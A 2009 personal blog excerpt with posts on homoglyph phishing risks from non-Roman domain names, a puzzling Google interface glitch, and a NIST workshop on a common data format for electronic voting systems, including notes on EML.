Expanding beyond Roman characters also increases potential for site rip-offs that use homoglyphs, characters with identical or indistinguishable shapes. This already occurs to some degree (for instance pointing your browser to google.com takes you to a different site than go0gle.com) but different languages might have characters that are identical to characters in other languages.



If you're interested follow the google thread here, and some more reading about that here, here and here.

Friday, October 30, 2009

What happened to Google ?

Hi Folks,
yesterday evening while I was planning my roadtripping from Washington DC to Davis (CA), I found this interesting Google bug (?)



Well.... What button should I click to send the link to my friend ?

Thursday, October 29, 2009

Workshop on a Common Data Format for Electronic Voting System

Today and tomorrow I'm involved in NIST Workshop on a Common Data Format for Electronic Voting System

The goal of this two-day workshop is to identify and agree upon a set of requirements for a common data format for voting systems. While there have been many calls for a common data format for voting systems, there is little consensus on the requirements for this format or what it is to accomplish. Possible goals for a common data format include interoperability of different equipment, auditability, transparency, publishing (communication with consumers of election data, such as media outlets), integration between polls and registration, transition to electronic record-keeping, or the ability just to "get the data out" by any means possible. Stakeholders include manufacturers, election officials, the EAC, consumers of election data, voters, organizations with existing data formats (including OASIS and the Voting Information Project), academics, and others with related work.


I believe this workshop comes in the right time, we really need a common data format. Actually, there are too many different formats, each vendor use its own one for final reports, configuration files and communication messages. So far, not only Interoperability is a dream but also integratability is very far from the current voting systems. EML seems to be the far light and the common criteria for each system, but it is also very huge. Just to let a little flavour, EML takes care about four big set:


- Transactions (Pre-election, Election and Post-election)

- Specification (otlines voting process, identifies data requirenments, contains glossary of term, addresses security issues, overview aof the XML schemas)

- Data Dictionary (Defines all exchanged data componets)

- XML Schema (Family of 38 components, 29 specific exchange schema, 2 new US driven schema developed for UML 6.0 )



In addition we ha to remember that laws are different from state to state and EML may permit to do something which maybe it's forbidden in some states. On the other side of the coin we cannot implement different EML's slangs... we'll back to the present situation. Moreover US' precincts are so different, some are huge like LA (millions of voters) and other ones are small (hundred of voters) and they use different kind of voting systems. This is another issue, it's difficult to figure out a so much general Data Format able to satisfy each precinct.

So, let's go ! We have a lot to do to improve our democracy.